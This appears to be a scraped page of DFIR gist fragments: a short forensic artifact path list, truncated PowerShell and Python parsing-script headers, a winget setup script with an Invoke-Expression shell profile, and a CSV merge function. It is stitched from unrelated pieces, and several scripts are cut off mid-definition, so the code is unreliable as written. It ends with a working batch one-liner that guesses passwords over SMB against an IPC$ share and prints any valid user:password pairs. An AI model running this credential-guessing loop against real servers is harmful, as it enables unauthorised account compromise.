This is a list of forensic artifacts that the DFIR community can use when performing cyber investigations.
- XP - c:\windows\setupapi.log
- W7+ - c:\windows\inf\setupapi.dev.log
- c:\$Recycle.Bin*
- c:\Recycler*
[CmdletBinding()] | |
param | |
( | |
[Parameter(Mandatory = $true, | |
Position = 1, | |
HelpMessage = 'Specify the Microsoft Defender MPLog file to parse.')] | |
[String]$InputFile, | |
[Parameter(Mandatory = $true, | |
Position = 2, | |
HelpMessage = 'Specify the folder where the output file will be placed.')] |
<#
.SYNOPSIS
Convert PowerShell ConsoleHost_history.txt files from the specified source directory into a single CSV file.
The original script that copies the ConsoleHost_history.txt files is by Andrew Rathbun and Matt Arbaugh: https://github.com/AndrewRathbun/DFIRPowerShellScripts/blob/main/Move-KAPEConsoleHost_history.ps1
.PARAMETER InputDir
Specify the folder which contains the ConsoleHost_history.txt file(s). Ideally the C:\ or C:\Users|Utilisateurs|Usuarios|Benutzer directory, in order to grab the file(s) from all users.
.PARAMETER Destination
Specify the folder where the ConsoleHost_histories.csv file will be placed.
import csv | |
import yaml | |
import argparse | |
import os | |
import sys | |
filenames = [] | |
def main(): |
# Workstation bootstrap: create the local checkout folder, then install the
# tool set through winget. Every install uses -e (exact package-id match);
# only the Git install pre-accepts the package and source agreements.
New-Item -Path 'c:\github' -ItemType Directory
winget install --id=Git.Git -e --accept-package-agreements --accept-source-agreements
# Remaining packages, installed in this order with plain "winget install --id=<id> -e".
$wingetIds = @(
  'Microsoft.VisualStudioCode'
  'AgileBits.1Password'
  '7zip.7zip'
  'Twilio.Authy'
  'Bethesda.Launcher'
  'Microsoft.Bicep'
  'Microsoft.bitsmanager'
  'BrutalChess.BrutalChess'
)
foreach ($id in $wingetIds) {
  winget install "--id=$id" -e
}
# Interactive shell profile: prompt theme, file-type icons, and PSReadLine
# history-based predictions shown as a list.
# oh-my-posh prints the prompt-setup script as text; piping it into
# Invoke-Expression runs that text as code. NOTE(review): the oh-my-posh binary
# and the theme file under $env:POSH_THEMES_PATH are therefore trusted as code
# and should be writable only by the profile owner — confirm on the machine.
& oh-my-posh init pwsh --config "$env:POSH_THEMES_PATH\powerlevel10k_rainbow.omp.json" | Invoke-Expression
Import-Module Terminal-Icons
# Both PSReadLine prediction options are set in a single call.
Set-PSReadLineOption -PredictionSource history -PredictionViewStyle ListView
# Usage: Merge-CSVFiles
# Usage: Merge-CSVFiles -Path C:\files\to\merge\ -Filter "*.csv" -OutputFile C:\Temp\merged.csv
# Combination of https://declanbright.com/downloads/Combine-Files.ps1 and https://gallery.technet.microsoft.com/scriptcenter/CombineMerge-multiple-CSV-23a53e83
function Merge-CSVFiles { | |
[cmdletbinding()] | |
param( | |
[string]$Path = ".", | |
[string]$Filter = "*.csv", | |
[string]$OutputFile = "c:\Temp\Merged_$(get-date -f yyyy-MM-dd_HHmmss).csv" |
:: Credential-guessing loop over SMB: each password in pass.txt is tried against every
:: user in users.txt by authenticating to the IPC$ share with "net use"; a success is
:: echoed as user:password and the session is removed again. Every attempt is a network
:: logon on the server, so from a defender's view this is noisy: the server's Security
:: log records each attempt, and account-lockout policy applies to every user tried.
@FOR /F %p in (pass.txt) DO @FOR /F %n in (users.txt) DO @net use \\SERVERIP\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\SERVERIP\IPC$ > NUL |